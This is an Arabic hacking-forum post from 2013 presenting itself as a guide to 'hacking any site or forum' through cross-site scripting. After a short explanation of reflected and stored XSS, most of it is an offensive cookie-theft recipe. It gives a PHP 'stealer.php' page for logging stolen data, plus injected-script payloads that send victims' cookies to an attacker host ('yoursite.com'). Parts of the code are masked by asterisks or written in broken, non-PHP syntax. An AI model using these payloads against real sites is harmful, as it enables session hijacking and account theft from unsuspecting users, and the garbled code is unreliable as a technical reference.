التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-02-2013, 07:34 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Saad Ghamdi
 

 

 
إحصائية العضو







Saad Ghamdi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Saad Ghamdi is on a distinguished road

.......... اخترق اي موقع او منتدى مع ثغرة ( xss )


بسم الله الرحمن الرحيم

اليوم نتكلم عن ثغرات ( xss ) وبنتطرق لأهم الأشياء التي يتم استغلالها وتعاريف واشياء مفيده ...

ما هي ثغرات XSS وكيف يتم اختراق الموقع بواسطة هذه الثغره

ان المواقع المصابة بثغرات ( XSS ) هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال احد الأكواد التالية :
  • javascript
  • HTML
  • PHP

اي ان ( XSS ) تعني امكانية تعديل محتويات الموقع ، ومعظم هذه الثغرات موجودة في مربعات البحث في المواقع ، وناخذ مثال على ذلك عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص

كود PHP:
www.infectedsite.com/search.php?q=word 
يكون الموقع قد كتب في صفح البحث جملة ( نتائج البحث لـ word ) , واذا ادخلنا سكربت جافا في خانة البحث كالتالي :

http://www.infectedsite.com/search.php?q=***************("XSS")</script>word

ستكتب صفحة البحث نتائج البحث لـ ( ***************("XSS")</script>word )
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة ( XSS )
هذا يعني ان الموقع مصاب بثغرة ( XSS )


لماذا يكون الموقع مصابا بثغرة ( xss )

السبب هو لأن مبرمجي الموقع كسولين جدا لفلترة كلمة البحث من الرموز التالية :
كود PHP:
 #@$%^,.<> 
وذلك لمنع إدخال الأكواد التالية :
  • javascript
  • HTML
  • PHP

هناك نوعين من ثغرات (xss )


( 1 ) اول نوع وهو النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على احد المواقع ، ندخل كود جافا سكريبت كالتالي :


كود PHP:
 ***************("XSS")</script> 
سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

( 2 ) النوع المؤقت :
يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث كالتالي :

كود PHP:
http://www.infectedsite.com/search.php?q=***************("XSS")</script>word 
كيف نستطيع اختراق الموقع عن طريق ثغرة ( xss )

هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات ( XSS ) ، وأهمها سرقة الكوكيز ، طبعا اكيد تحتاج الى استضافة موقع تدعم PHP , ننشئ صفحة PHP كالتالي :

كود PHP:
 stealer.php 
تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة ( GET ) الكود :

كود:
<?php
 $data=$_GET["c"]
 $f=open("*******.tct","w")
 $f.write($data)
 $f.close()
 ?>

هذه الصفحة سوف تكتب البيانات التي تردها الى ملف ( *******.txt ) والبيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :

كود PHP:
http://www.infectedsite.com/search.php?q=******************.location("http://ypursite.com/stealer.php?c="+********.******);</script> 
هنا دمجنا السكريبت :

كود PHP:
 ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script> 
هذا الكود سيحول الضحية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيم الكوكيز عن طريق الأمر :

كود:
******** . ******
هنا اذا فتحنا الملف

كود:
http://yoursite.com/*******.txt
ستجد الككيز للمستخدم مكتوبة فيها

اما في الثغرات الدائمة فيكفي ادخال الكود التالي :
كود PHP:
 ******************.location("http://yoursite.com/stealer.php?c="+********.location)</script> 
وسبب إدخال الكود السابق لسرقة الكوكيز ، وايضا نستطيع في الثغرات الدائمة ان نحول متصفح الموقع المصاب بالثغرة ( XSS ) ،عن طريق سكريبت :

كود PHP:
 ********.location 



هذا وصلى الله وسلم على صاحب الجبين الأزهر نبينا محمد وعلى آله وصحبه اجمعين
وعيدكم مبارك وكل سنة وانتوا بصحه وعافية



hojvr hd l,ru h, lkj]n lu eyvm ( xss )

التوقيع

Don't let idiots ruin your day

 


التعديل الأخير تم بواسطة Saad Ghamdi ; 08-02-2013 الساعة 07:38 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
ثغرة, xss


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 02:22 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0